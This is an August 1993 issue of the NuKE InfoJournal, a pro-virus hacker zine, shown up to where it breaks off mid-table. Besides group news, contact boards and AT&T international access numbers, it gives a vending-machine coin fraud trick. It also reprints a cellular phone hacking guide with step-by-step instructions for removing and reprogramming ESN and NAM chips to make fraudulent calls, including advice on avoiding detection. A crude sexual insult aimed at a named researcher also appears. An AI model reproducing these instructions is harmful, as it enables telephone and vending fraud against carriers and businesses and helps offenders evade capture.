NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE KE -N -N NuKE Informational Journal uK uK Issue #7 E- E- August 1993 Nu Nu KE KE (C) Copyright 1993 NuKE Software Publishing Inc. -N -N uK uK NuKE is a corporation officialy registered with the Canadian government E- E- Nu NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE NuKE InfoJournal #7 August 1993 Article Topics ~~~~~~~~~~~~~~ 000. Table of Contents (this file)........................................... 001. A NuKE International News Update........................................ 002. AT&T USADirect Information.............................................. 003. Cellular Telephones Hackers Guide : Cellular System Intro PART 1. 004. Cellular Telephones Hackers Guide : Hackers' Best Scams PART 2. 005. Cellular Telephones Hackers Guide : Home System ID Codes PART 3. 006. Cellular Telephones Hackers Guide : Buyers Guide & Publications PART 4. 007. Cellular Telephones Hackers Guide : Programming Instructions PART 5. 008. The Original DaeMaen Virus (source code)................................ 009. Uncommon And Rare Explosives............................................ 010. The Dangers of Thunderbyte's TBClean Emulation Techniques............... 011. Varicella-][ Virus Eats Up Thunderbyte's TBClean (source code).......... 012. CARO's Undisclosed Meeting Agenda................................PART 1. 013. CARO's Undisclosed _Illegal_ Meeting Agenda......................PART 2. 014. Toll Fraud Device (2600 reprint)........................................ 015. To sara gordon Or Not To sara gordon That Is The Question............... 016. An E-Z Guide To Remote UNIX Disk Mounting............................... -------------------------------------------------------------------------------- % NuKE Membership and Supporters % NuKE Members ~~~~~~~~~~~~ Rock Steady............Canada Nowhere Man............USA Savage Beast...........Switzerland Phrozen Doberman.......Australia Screaming Radish.......Australia ARiSToTLE..............USA Dr. X..................Canada Night Hawk.............Australia Pure Energy............Canada Shindaq Arl'hur........Australia The Weird One..........Australia Viper..................USA NuKE Contributors and Supporters ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Commander Tosh.........Bulgaria Little Loc.............USA Firecracker............USA Lone Wolf..............South Africa Hades..................USA Lvx....................USA Time Lord [P/S]........Canada Wolfee J...............USA Radioactive Rat........South Africa Vest...................USA Winnie the Pooh........Bulgaria Greets to: Phalcon/SKISM, Trident, Urnst Kouch and the CryPt team, Control-C (612), Alan Solomon, Guido Sanchez, CARO, Nitro-187, Megadeth, Kim Clancy, Pallbearer (welcome back!), SubLogic, Sara "dark avenger is my lover" Gordon, Ned-239, all pro-virus individuals worldwide, and everyone out there who's a victim of "the system." W H E R E T O C O N T A C T N U K E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cybernetic Violence........+1 514 426 9194 v32b NuKE World HQ Black Axis.................+1 804 599 4152 v32b NuKE American HQ The Brutal Truth...........+61 3 899 9213 Dual NuKE Australian HQ Enigma E:N:U:N.............+41 22 340 0329 v32b NuKE European HQ TRATEOTU...................+27 11 884 2270 2.4k NuKE African HQ NuKE members can also be contacted over our international network, NuKENet. =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "NuKE International News Update" Nu Nu KE KE By -N -N uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % NuKE International News Update % IJ#6 Errata ~~~~~~~~~~~ Unfortunately several mistakes were made in NuKE InfoJournal #6. Article #4 ("IRIS Guide") was written by Nitro-187, not Ned-239 as indicated in some copies of the InfoJournal. In article #2 ("A Guide to the North American Numbering System"), by Nowhere Man, the non-published number percentage chart should list Bakersfield, California as being in area code 805. We apologize for any inconvenince to our readers or writers. Two Years Of NuKE! ~~~~~~~~~~~~~~~~~~ This month marks the second year of NuKE's existance! NuKE was founded in August 1991 as an H/P group local to 514 (Montreal, Canada). Since then NuKE has matured and evolved in to an international pro-virus group with a worldwide network and many inovative products. Two years may not seem like much, but there have been very few "groups" that have lasted this long... News From Europe ~~~~~~~~~~~~~~~~ NuKE now has four sites in Europe, adding Land of Lost Souls in Sofia, Bulgaria (sysop: Winnie the Pooh). Winnie is working on adding sites in the former USSR and other parts of Eastern Europe. Savage Beast reports that sites are under consideration in Spain; he is unable to add any French sites because of overzealous computer crime laws in that country. A Belgian site is on the way, too. Besides Land of Lost Souls, NuKE maintains three boards in Switzerland, one in the French- speaking areas and two in the German-speaking areas. NuKE's European branch is finally growning again after the closing of several of its sites due to hardware problems, personal difficulties, and police raids. NuKE Site Changes ~~~~~~~~~~~~~~~~~ Cybernetic Violence, NuKE's world headquarters, now has a new number. It can be reached 24 hours a day, 7 days a week at +1 514 426 9194. The old number is no longer valid! Cybernetic Violence (sysop: Pure Energy) is located in Montreal, Quebec, Canada, and runs 24 hours/day 7 days/week at 14.4k v.32bis. Cybernetic Violence is also the central hub of NuKENet. The Hell Pit (sysop: Hades), located in Chicago, Illinois, USA, has upgraded its modem and is now running at 14.4k v.32bis. The Hell Pit can be reached 24 hours/day 7 days/week at +1 708 459 7267. New 500 Area Code ~~~~~~~~~~~~~~~~~ In July 1993 Bellcore, the agency designated to assign area codes and exchanges (NXXs) for the U.S., Canada, and the Caribbean, announced that starting sometime in August (pending U.S. government approval) it will allocate numbers in the 500 NPA for use by personal communication services. Exchanges will be handed out to corporations if they show a real need -- already AT&T and Atlantic Bell have asked for exchanges. In the future, NPA 500 will probably also be used for cellular phones, pagers, and other mobile services. Quelle Horrible! Rock Steady French?! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In an interview done by Netta Gilboa of _Gray Areas_ Magazine (an excellent publication, highly recommended) with Urnst Kouch, published in Gray Areas no. 3 and reprinted in Computer Underground Digest vol. 5 no. 44, Urnst Kouch states in error that "Rock Steady is French-Canadian." We here at NuKE would like to make it very clear that Rock Steady is not French, never was French, and never will be French. Not everyone who lives in Quebec is a Francophone... NuKENet -- One Year Old And Still Growing! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This summer marks the first anniversary of the creation of NuKENet. NuKENet began in mid-1992 as a mail link between Cybernetic Violence in Canada and Total Mayhem in Australia. It has since grown into a huge multinational network with sites in Europe, Africa, Australia, and North America. In fact, NuKENet can now be reached via the FidoNet backbone at NUKE_THEWORLD -- request it today! Interested in joining NuKENet? We'd be happy to have you, *if* you're the right kind of system... Boards wishing to join NuKENet should contact a net administrator; if that's not possible, mail any NuKE member or supporting sysop for information. Area Contact System Phone Number ~~~~ ~~~~~~~ ~~~~~~ ~~~~~~~~~~~~ United States ARiSToTLE Black Axis +1 804 599 4152 Europe Savage Beast Enigma E:N:U:N +41 22 340 0329 Africa Lone Wolf TRATEOTU (22h-15h GMT+2) +27 11 884 2270 Australia/NZ Phrozen Doberman The Brutal Truth +61 3 899 9213 Canada/Other Pure Energy Cybernetic Violence +1 514 426 9194 Area Split For Alabama ~~~~~~~~~~~~~~~~~~~~~~ On July 22, 1993 South Central Bell announced that Alabama will become the first state to gain an interchangable (NXX) area code. In 1995 area code 205 will split; Huntsville and Birmingham will remain in 205, while Montgomery and Mobile will move to area code *334*. More details will be published as they become available. The following chart summerizes the remaining North American area code splits: NPA/NEW Location Split Full Cutover ~~~~~~~ ~~~~~~~~ ~~~~~ ~~~~~~~~~~~~ 416/905 Ontario, Canada October 4, 1993 March 1994 (TBA) 919/910 North Carolina, USA November 14, 1993 February 13, 1994 313/810 Michigan, USA December 1, 1993 August 10, 1994 215/610 Pennsylvania, USA 1994 (TBA) TBA 205/334 Alabama, USA 1995 (TBA) TBA Trick Of The Month ~~~~~~~~~~~~~~~~~~ Special thanks to Vest from 708 for an intresting tidbit of information -- spent three volt lithium batteries (model number CR-2032) will register as nickles in coin-operated vending machines! Use old, exhausted batteries only, though, since new batteries are around US$2.00 each... This has only been tested in the U.S., but the CR-2032 is even closer in circumference and weight to the Canadian nickle. If you call around, you might be able to pick up bags of spent batteries for "recycling." Note: this information is for informational purposes only, and is meant to alert owners of coin-operated devices so that such fraudulent acts might be detected and prevented. Tough Swiss Anti-Piracy Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In response to rampant piracy throughout the country the Swiss government has enacted tough new anti-piracy laws that force people convicted of using pirated software to name the person(s) providing the software or face additional penalties. In Switzerland piracy has been particularly bad, with most businesses using pirated software and some huge pirate boards charging up to US$500 for unlimited access to copyrighted programs. Viruses are not affected by the new law: possessing and creating viruses are still legal in Switzerland. Anti-Virus Results ~~~~~~~~~~~~~~~~~~ Savage Beast has conducted experiments with various anti-virus products and has concluded that "a lot of them only look good...they're really shit." No surprise there...however Savage has provided us with scientific data to back up his claims. Below are the results of scanning with the latest versions (as of July 1993) of various virus scanners -- judge for yourself: Product Maker Virus Tested Virus Found MTE Tested MTE Found ~~~~~~~ ~~~~~ ~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~ ~~~~~~~~~ SCAN 106 McAfee 2547 2075 200 200 M.S. AV Microsoft 2547 1500 200 0 F-Prot F. Skulason 2547 2253 200 200 XScan Anyware 2547 2151 200 200 C.P. AV Central Point 2547 1700 200 0 Norton AV Symantec 2547 1566 200 3 HackBuster H&B 2547 1776 200 0 ViruSafe Heliashim 2547 1896 200 0 As you can see, even the "best" products (F-Prot, XScan, SCAN) will miss between 15% and 20% of current viruses. Even if you think your computer is "protected" from viruses you can still get a virus from one out of five infected programs...and that's not counting MTE-using viruses -- only three of the scanners provide acceptable protection against the Mutation Engine, which has been out for over two and a half years. Each time you put a new disk in your floppy drive, ask yourself if this might be the "1 in 5." The NuKE Crew ================================================================================ ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "AT&T USADirect Information" Nu Nu KE KE By -N -N uK uK Nowhere Man E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 % AT&T USADirect % With international telephone services becoming more and more integrated and international calls becoming more and more common, it only makes sense than calling cards would also evolve to ease international calling. AT&T Calling Cards are usable to call back to the U.S. from over 170 different countries, and to even call *between* 46 countries outside the U.S. (called AT&T World Connect service). The AT&T USADirect Service is available in over 110 countries. This service connects you immediately back to an English-speaking AT&T operator in the U.S., who will take your calling card number and place your call for you. The following is the procedure for using USADirect: 1. Dial the USADirect access number for the country you're calling from. 2. An English-language voice prompt will ask for the telephone number you are calling. Enter the area code and seven-digit phone number. 3. After the tone, enter your 14-digit AT&T Calling Card number, which includes the last four digits, your PIN. If you're calling collect, press zero for an English-speaking operator. If you are at a telephone that does not have access to automated service, simply wait for the English-speaking AT&T operator to greet you. To call from country to country using World Connect service, please wait for the AT&T operator to assist you. The operator will ask for your AT&T Calling Card number and place the international call for you. To place additional calls, press # after your party hangs up and follow the voice prompts. To call 800 numbers, ask the AT&T operator to connect you. Unfortunately, she will only connect calls to AT&T 800 customers...however, this USADirect service can be used by people who live outside the U.S. to reach 800 numbers. You don't need to have an AT&T Calling Card to do this. Use your regular AT&T Calling Card number, not the international number. To learn more about USADirect service, call (800) 331 1140 ext. 406 from the U.S., or call collect to +1 412 553 7458 ext. 806 from abroad. Country Phone Number ~~~~~~~ ~~~~~~~~~~~~ Andorra 19 (wait for second dial tone) 0011 Anguilla 1-800-872-2881 Antigua 872 (Boatphone Marine) or #1 (public card phones) Argentina 001-800-200-1111 Aruba 800-1011 Australia 0014-881-011 Austria 022-903-011 Bahamas 1-800-872-2881 Bahrain 800-001 Belgium 078-11-0010 Belize 555 Bermuda 1-800-872-2881 Bolivia 0-800-1111 Brazil 000-8010 British Virgin Islands 1-800-872-2881 Cambodia 800-0011 Cape Verde Islands 112 Cayman Islands 1-800-872-2881 Chile 00 (wait for second dial tone) 0312 China 10811 Columbia 980-11-0010 (English) or 980-11-0011 (Spanish) Costa Rica 114 Cyprus 080-90010 (former) Czechoslovakia 00-420-00101 Denmark 8001-0010 Dominica 1-800-872-2881 Dominican Republic 1-800-872-2881 Ecuador 119 Egypt 510-0200 (in Cairo) or 02-510-0200 (elsewhere) El Salvador 190 Faeroe Islands 8001-0010 Finland 9800-100-10 France 19 (wait for second dial tone) 0011 Gabon 00 (wait for second dial tone) 001 Gambia 00111 Germany 0130-0010 Ghana 0191 Gibraltar 8800 Greece 00-800-1311 Grenada 872 Guam 018-872 Guatemala 190 Guyana 165 Haiti 001-800-872-2881 Honduras 123 Hong Kong 800-1111 Hungary 00 (wait for second dial tone) 800-01111 Iceland 999-001 India 000-117 Indonesia 00-801-10 Ireland 1-800-550-000 Israel 177-100-2727 Italy 172-1011 Ivory Coast 00-1111 Jamaica 0-800-872-2881 Japan 0039-111 Kenya 0800-10 Korea 009-11 Kuwait 800-288 Liberia 797-797 Liechtenstein 155-00-11 Luxembourg 0-800-0111 Macao 0800-111 Malawi 101-1992 Malaysia 800-0011 Malta 0800-890-110 Monaco 19 (wait for second dial tone) 0011 Montserrat 1-800-872-2881 Netherlands 06 (wait for second dial tone) 022-9111 Netherlands Antilles 001-800-872-2881 New Zealand 000-911 Nicaragua 64 (in Managua) or 02-64 (elsewhere) Nigeria 1881 Norway 050-12011 Panama 109 Paraguay 0081-800 (in Asuncion only) Peru 191 Philippines 105-11 Poland 0 (wait for second dial tone) 010-480-0111 Portugal 05017-1-288 St. Kitts/Nevis 1-800-872-2881 Saipan 235-2872 San Marino 172-1011 Saudi Arabia 1-800-100 Singapore 800-0011 Spain 900-99-00-11 Sri Lanka 430-430 Suriname 156 Sweden 020-795-611 Switzerland 155-00-11 Taiwan 0080-10288-0 Thailand 0019-991-1111 Turkey 9 (wait for second dial tone) 9-8001-2277 United Arab Emirates 800-1-0010 United Kingdom 0800-89-0011 Uruguay 00-0410 Venezuela 80-011-120 (English) or 80-011-121 (Spanish) (former) Yugoslavia 99-38-0011 Zambia 00-899 Zimbabwe 110-899 Notice that most numbers include 011, the international dialing prefix in the U.S. and Canada, or 288, "ATT" on the telephone keypad... Note that Canada is not included in the list since AT&T Calling Cards can be used in Canada the same way they are used in the U.S. (0+NPA+NXX-XXXX or placed through the operator). The following countries will accept AT&T Calling Cards, but access to USADirect is restricted to special phones at certain places that Americans tend to congregate (hotels, airports, rail stations, etc.): Barbados, Ethiopia, Mexico, Qatar, Romania, St. Lucia, Seychelles Islands, Sierra Leone, Trinidad and Tobago, Turks and Caicos, Uganda, and Yemen. AT&T USADirect is an easy way to call the U.S. from abroad. Of course, you have to have an AT&T Calling Card to use the service... Happily, AT&T will issue calling cards to people who do not use AT&T long distance service, including people who do not live in the USA. Call (800) 525 7955 for more information on obtaining an AT&T Calling Card outside the U.S. (or call (800) 222 0300 if you want to obtain a calling card billed to your U.S. home phone line). Information for this article was compiled from "International Dialing Guide," a booklet published by AT&T's International Information Service. You can obtain one for yourself (they're free) by calling (800) 874 4000 and asking for it. Nowhere Man/NuKE =============================================================================== ================================================================================ NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- E- "The _COMPLETE_ Cellular Telephone Hackers Guide Nu Nu PART 1 KE KE The Cellular Telephone System" -N -N OCRd By uK uK The NuKE Crew E- E- Nu E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu NuKE InfoJournal #7 August 1993 [The following five part series consists of information that we scanned in from the book "The Complete Cellular Telephone Hackers Guide" published by Dynaspek Inc. of Westmont, Illinois, USA. Reprinted without permission. You can order this book by sending US$53.95 (incl. S/H) by check or money order to Dynaspek, P.O. Box 564, Westmont, IL 60559, or call them at +1 708 971 1585 for more information. -NM] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% NOTICE %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% The information in this manual is intended to be used as an educational guide for those seeking technical information about Cellular Mobile Telephone (CMT) operation. While the information in this manual is meant to serve as a guide to cellular phone vulnerabilities, keep in mind that it is against the law to modify a cellular phone for fraudulent use. The law states that no person shall intercept or receive, or assist in intercepting or receiving, any communications service offered over a cellular telephone frequency unless specifically authorized to do so by a local telephone company or as may otherwise be specifically authorized by law. Therefore, it is the sole responsibility of the user of this manual to conform to the rules and regulations of both Federal and State/Provincial government in the use of the information contained herein. It is the responsibility of the user of this manual to arrange and pay for, as necessary, and signals used in testing any of the circuits or information contained herein. The authors and those that helped research this article accept _no_ liability or responsibility for the misuse of the information in this manual, or for any modifications made on any cellular mobile telephone. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Cellular System Operation % The Cellular Mobile Telephone Systems is a low-powered, full duplex, radio/ telephone which operates between 800 and 900 Mhz, using multiple transceiver sites linked to a central computer for coordination. The sites, or "cells", named for their honeycomb shape, cover a range of three to six, or more, miles. (five to nine kilometres) in each direction. Their range is limited only by certain natural or man-made objects. The cells overlap one another and operate at different transmitting and receiving frequencies in order to eliminate cross-talk when transmitting from cell to cell. Each cell can accommodate up to 45 different voice channel transceivers. When a cellular phone is activated, it searches available channels for the strongest signal and locks on to it. While in motion, if signal strength begins to fade, the telephone will automatically switch signal frequencies or cells as necessary without operator assistance. It fails to find an acceptable signal, it will display an "out of service" or "no service" message, indicating that it has reached the limit of its range and is unable to communicate. % Identification % Each mobile telephone has a unique identification number which allows the Mobile Telephone Switching Office (MTSO) to track and coordinate all mobile phones in its service area. This ID number is known as the Electronic Security Number (ESN). The ESN and Telephone Number are NOT the same. The ESN is permanent number engraved into a memory chip called a PROM or EPROM, located in the telephone chassis. This number cannot be changed through programming as the telephone number can, although it can be replaced. Each time the telephone is used, it transmits its ESN to the MTSO by means of DTMF tones during the dialling sequence. The MTSO can determine which ESN's are good or bad, thus individual numbers can be banned from use within the system. Call Switching Cell sites switching is done automatically by the MTSO. The MTSO constantly monitors signal strength data of both the caller and the receiver. To maintain signal quality, when signal strength begins to fade, the MTSO locates the next best cell site and re-routes the channels to maintain the communications link. The switch takes approximately 300 milliseconds and is not noticeable to the user. All switching is handled by computer, with the control channels telling each cellular unit when and where to switch. % The Numeric Assignment Module (NAM) % A Numeric Assignment Module, or NAM, is a programmable, read-only-memory (PROM). The NAM holds a limited amount of data, usually only 128 or 256 bits. NAM's used are typically made by either NEC or Signetics. Common chip numbers are 82S23, 82S123 or equivalent. Other NAM's are manufactured by National Semiconductors, Fujitsu, Texas Instruments, AMD and others. The NAM is actually a 32-word by 8 bit PROM which is programmed with a PROM programmer/burner. The 32x8 PROM (256 bits, 32 word by 8 bit) bits are like fuses. A programmer will trigger certain fuses within the NAM in order to give the phone a unique identity and certain options. NAM's are easy to purchase. Only the number of the chip is needed to buy one. Consulting the latest issue of an IC MASTER is one way to determine what's inside the chip and who distributes it. The NAME is used to store the Mobile Identification Number (MIN), Lock Code, the Home Systems Identification number (SIDH), and various other system data. From the beginning address of the NAM, 00, you will find the System Identification Home number (SIDH). Each market allows for two systems. These two digits are even for the wire-line and odd for the non-wireline. There are two kinds of NAMs used in cellular telephones: "TRI-STATE" and "OPEN COLLECTOR" It is _mandatory_ to identify the type of NAM in your cellular telephone before attempting to replace it. After it has been identified, any of the electronic supply companies should be able to supply a replacement. A TRI-STATE NAM can be used in over 95% of the cellular telephones on the market today containing replaceable NAM's. *** The NEC cellular series will _only_ accept tri-state NAM's *** The identify the NAM chip compare the numbers in the READILY AVAILABLE NAME TYPES table to the various chips on the circuit board for a match. The NAM chip is usually factory mounted on a ZIF socket. *** Motorola handheld phones, require special NAM's. Try calling the cellular phone stores in your area. *** % READILY AVAILABLE NAME TYPES % Open Collector Tri-State NAM Brand Part Number Part Number AMD AM27LS18 AM27LS19 Fujitsu MB7056 MB7051 Harris HM7602 HM7603 MMI 53/63S080 53/63S081 MMI 53/6330 53/6331 NSC DM54S188 DM54S288 NSC DM82S23 DM82S123 TI TBP38SA030 TBP38S030 TI 74S188 74S288 (the most common) (try National Semiconductor) % Programming the NAM % NAM's are generally mapped the same in all cellular phones. Codes such as Mobile Id numbers (MIN1, MIN2), Homer System Id (SIDH), Access Overload Class (ACCOLC), Group Identification Mark (GIM), Electronic Serial Number (ESN), and options are programmed into the NAM. % Format Map for NAM % MOST BIT SIGNIFICANCE LEAST HEX ADDR. ----------------------------------------------------- 0 SIDH(14-8) 00 SIDH(7-0) 01 (8x32 NAM) LU 0 0 0 0 0 0 MIN 02 A/B RI MIN2(33-28) 03 MIN(27-24) 0 0 0 0 04 0 0 0 0 MIN(23-20) 05 MIN1(19-12) 06 MIN1(11-4) 07 MIN1(3-0) 0 0 0 0 08 0 0 0 0 SCM(3-0) 09 0 0 0 0 0 IPCH(10-8) 0A IPCH(7-0) 0B 0 0 0 0 ACCOLC(3-0) 0C 0 0 0 0 0 0 0 PS 0D 0 0 0 0 GIM(3-0) 0E LOCK DIGIT 1 LOCK DIGIT 2 0F LOCK DIGIT 3 LOCK DIGIT 4 10 EE 0 0 0 0 0 0 REP 11 HA 0 0 0 0 0 0 HF 12 SPARE LOCATIONS CONTAIN ALL ZEROS 13 SPARE 14 SPARE 15 SPARE 16 SPARE 17 SPARE 18 SPARE 19 SPARE 1A SPARE 1B SPARE 1C SPARE 1D NAM CHECKSUM 1E NAM CHECKSUM 1F % Cell Terms for the above abbreviations % A/B : A switch located on the mobile telephone that allows the user to select which frequency black (carrier) he or she wishes to use. Some telephones have an internal switch from one block to the other when service is not available on the pre-set block. ACCOLC : Access Overload Class. There is no standard in use within the United States at this time. This system offers priority depending on how it is selected in the event of system overload. Typically set to 0 plus the last digit of the phone number to provide random loading. Originally, when the Federal government began designing cellular systems, they intended to give emergency vehicles (such as police, ambulances, and Fire Departments) codes that would allow them priority over other subscribers, to communicate during emergencies. EE : End to End signalling. DTMF signals are sent through the lines to signal the end of a conversation. A tone code is also used to access long distance carriers, to signal your answering machine, or to access your voice mail. GIM : Group Identification Mark. This is a two-digit number assigned by the cellular carrier which determines roaming rights throughout the system. As cellular systems are upgraded, the GIM will be on line real time, requiring all NAM information, including the Mobile Identification Number (MIN), to be validated before a subscriber is allowed to call outside of their home area. IPCH : Initial Paging Channel. 334 - wireline systems. 333 - non-wirelne systems. LOCK DIGIT : This field is a one - four digit code. It locks the cellular telephone to prevent unauthorized use. The lock code is programmed into the NAM, and is frequently factory set to either 1234 or 0004. LU : Local Use flag. Occasionally used to initialize approval for local calls. The cellular carrier insures that local users are registered with a local system. Hackers use the Roaming Technique to avoid this complication. HA : Horn Alert. 0 or 1. A 1 in this field tells the cellular phone that this feature is available. HF : Hands Free. 0 or 1. A 1 in this field tells the cellular phone that this feature is enabled. MIN1 : Mobile Identification Number. The telephone number assigned to the telephone by the cellular carrier. If the telephone is brought in, or a new one is purchased, the cellular service assigns this number for both billing and for receiving calls. 7 or 10 digits in length. MIN2: The area code of the cellular phone number. MIN MARK : Can be 0 or 1. The home station sends extended address data upon origination and page response. REP : Repertory dialling. Speed dialling. Some phones are capable of storing 100 numbers. SCM : Station Class Mark. Identifies the phone as either a hand-held or transportable/fixed cellular phone. SCM is determined by the transmit power of the phone (0.8 watts for hand-held, 1.2, 3.0 watts for transportable/fixed) SIDH : Home System Id. Code used to identify the Home system where the cellular telephone is registered. (See the Home System Id Listing Article) % What About the Electronic Serial Number (ESN) % An Electronic Serial Number, or ESN, is the unique, 32-bit, eleven-digit serial number for each cellular telephone sold. The ESN is transmitted each time a cellular telephone places a call. It is used to verify whether a cellular telephone is registered with an authorized carrier. A dealer needs the ESN in order to restore the service on a used phone. The first three numbers are the manufacturer's decimal code. The fourth and fifth are reserved, and may contain any digit, zero through nine. The remaining six numbers are the decimal serial number for each individual phone. 1 2 3 4 5 6 7 8 9 10 11 Manufacturers Reserved Decimal serial number ESN code 0-9 of the phone The decimal serial number can occasionally be found within the documentation provided with a new cellular phone. In some cases, the ESN is engraved on the telephone itself, but this is not universal with all manufacturers. If a cellular telephone has been disconnected for any reason, the ESN must be provided in order for service to be reestablished with the Carrier. Each manufacturer assigns their own ESN to every mobile telephone. Therefore, a single ESN may be duplicated by one or more manufacturers. A hacker may bypass this system by altering other system information and leaving the particular telephone's ESN unaltered. *** CHANGING the ESN is THE ONLY SURE WAY to minimize any risk of getting caught *** The ESN is assigned at the factory, and in almost all cases, is the only element that cannot be altered by use of the programming sequence without removing it and replacing it with a new chip. The ESN chip is always factory soldered and occasionally epoxide onto the circuit board to reduce tampering. A decent hacker will be able to remove it and install a ZIF (Zero Insertion Force) socket in its place. The ZIF socket makes it easy to replace the ESN chip at any time. The NAM chip usually factory installed in a ZIF socket. % How to locate the ESN % Several methods are available for locating a cellular telephone ESN. These methods are as follows: 1. The ESN is normally located on a PROM. The ESN is intentionally made to be unerasable on most cellular phones to prevent the fraudulent use of the phone. The PROM is programmed and installed at the factory with the security fuse blown in order to prevent tampering. The ESN code on a PROM may be read by removing the PROM from the cellular telephone and placing it in a PROM reader to obtain a memory map of the chip. The ESN PROM is distinctive because of its size and package. The ESN PROM will have between sixteen and twenty-eight leads, in a square or rectangular package. This is a BIPOLAR PROM. Most cellular telephones will accept the National Semiconductor 32x8 PROM, which cannot be reprogrammed. If a hacker knew the ESN of a particular cellular telephone, it is possible to trace the memory map by installing the PROM in a reader and obtaining a fuse map by use of the READ MASTER switch of the PROM programmer. Many PROM programmers contain a VERIFY and COMPARE switch to provide a comparison of one PROM's programming with another. This may be a complicated task for the first-timer, so it is recommended that a cellular telephone (bag phones are best) is purchased strictly for the purpose of dismantling it in order to locate the ESN. This will probably destroy the telephone, but will provide valuable experience. *** Some of the newer hand-held phone manufacturers (Motorola) are changing to VLSI (very large scale integration) which combine several other chips with the ESN chip, preventing hackers from programming those ships. Bag phones are almost an easy hack. *** 2. Hire a "Cellular Consultant." A consultant is someone who works as an installer and/or programmer, and would be able to show the user where the ESN is located. 3. Get in touch with a local cellular telephone servicer and simply ask for their help in identifying the memory chips in the telephone. Most technicians will help without too much difficulty. (It's called social engineering) 4. As a last resort, remove each memory chip and place it in a PROM reader. When one if found that registers a reading, the ESN has been located. 5. Take the phone to a cellular service provider and ask them to provide the ESN. They are often requested for insurance purposes, and can be supplied easily enough by use of a Cellular Service Monitor. The monitor reads the transmissions from the telephone and indicates the specific ESN. 6. The ESN is also normally provided with the original user information, if available. 7. ESN chips may be identified by some of the following manufacturers' markings: AMD, AMPS, DM, HARRIS, HM, MOTOROLA, MB, MMI, NS, NSC, TBP, TI. *** ESN Readers are also available for personal purchase. See "Buyers Guide" article for further information on Personal Readers. *** % Replacing the ESN % Now that you've located the ESN, how do you replace it? The ESN needs to be unsoldered in order to remove it. The user should be familiar with soldering techniques, extra care must be taken not to touch any of the surrounding connections, solder joints or chips. I do recommend you get a de-soldering pen, you should get the pen with the suction pump, it will remove the solder nicely. Chip pullers and de-soldering tools are available from any electronical semiconductors store, even Radio Shack. The following steps will aid in ESN removal: 1. Unscrew and remove the entire PC board containing the ESN. This is done to prevent inadvertent damage to the rest of the unit during the removing process. 2. Once you have determined which is the correct ESN chip, it is wise to make a sketch of it to insure that it is replaced in the proper place and direction. (Don't laugh, just DO IT.) 3. Using extreme caution, unsolder and remove the chip from the board. 4. Solder in a ZIF (Zero Insertion Force) socket to provide for easier removal and placement of additional chips. *** WARNING: No retailer, manufacturer or servicer will work on a unit in which the ESN has been removed. In addition, it is their responsibility to notify the proper authorities of such tampering. So if you screw up get a _trustable_ friend to help or trash the unit. *** 5. Once the ZIF socket has been installed, reinsert the ESN and attempt to place a call. If the call is successfully completed, the ESN has been properly removed and replaced. If the call does not go through, recheck the leads on the ZIF socket for proper installation. 6. Insert the ESN in a PROM reader to be sure it gets a reading. Use the search mode to identify the Manufacturer's Serial Number, in order to identify the first three addresses of the ESN on the PROM where reprogramming will be done. % Programming the ESN % Insert the ESN in a PROM programmer to be sure it gets a reading. Use the search mode and "read master" to identify the Manufacturer's Serial Number, in order to identify the first three addresses of the ESN on the PROM fuse map where programming the new chip will be done. Record the locations of the ESN. Use the "edit buffer" command to change one number of the ESN. A new PROM is then programmed with the PROM programmer. Instructions will come with the programmers. The entire PROM reading/emulating/programming process is relatively fast when a personal computer is available. (Some PROM programmers allow RS-232 interface with the IBM-PC clone, with the help of a computer program.) This will allow the use of an EPROM emulator and allow you to program (burn) PROM chips directly from the computer. The Installation of the ZIF socket makes it possible to insert an EPROM emulator into the socket. The hacker will often try a hundred or more ESN codes before finding a good one. Use of an EPROM Emulator will allow the hacker to load ESN codes without burning EPROMs until a good code is found and will save the hacker hundreds of chips with the wrong codes programmed into them. Use the emulator and the code read from the original chip, re-code a new PROM. Change the original ESN code by one number. Load the emulator and try making a phone call. Keep trying this process until a call is completed. The entire process is often completed in less than one-two hours. A Programmer for use with a personal computer will allow the hacker to store codes for easy editing and reprogramming new chips when the Cellular carrier blocks the particular ESN is use. Use the working ESN code from above to burn a new PROM and insert into the ZIF. *** Most smart hackers also change the SIDH and MIN on the NAM in order to minimize the possibility of being caught. *** *** Remember Hackers will always be smart about who they are calling and any traceable calling habits. *** Some other manufacturer's cellular telephones are privately labelled for certain companies. However, when reprogramming a cellular telephone, any valid ESN code will work on any phone. The numbers listed bellow are all Valid ESN Codes. % Manufacturer's ESN Codes % Manufacturer Decimal Hex Code Alpine Electronics 150 96 AT&T 158 9E Audiovox-Audiotel 138 8A Blaupunkt (Bosch) 148 94 Clarion Company 140 8C Clarion Manufacturing Company 166 A6 CM Communications 153 99 Di-Bar Electronics 145 91 E.D. Johnson 131 83 Emptel Electronics 178 B2 Ericsson 143 8F Ericsson GE Mobile 157 9D Fujitsu 133 85 Gateway Telephone 147 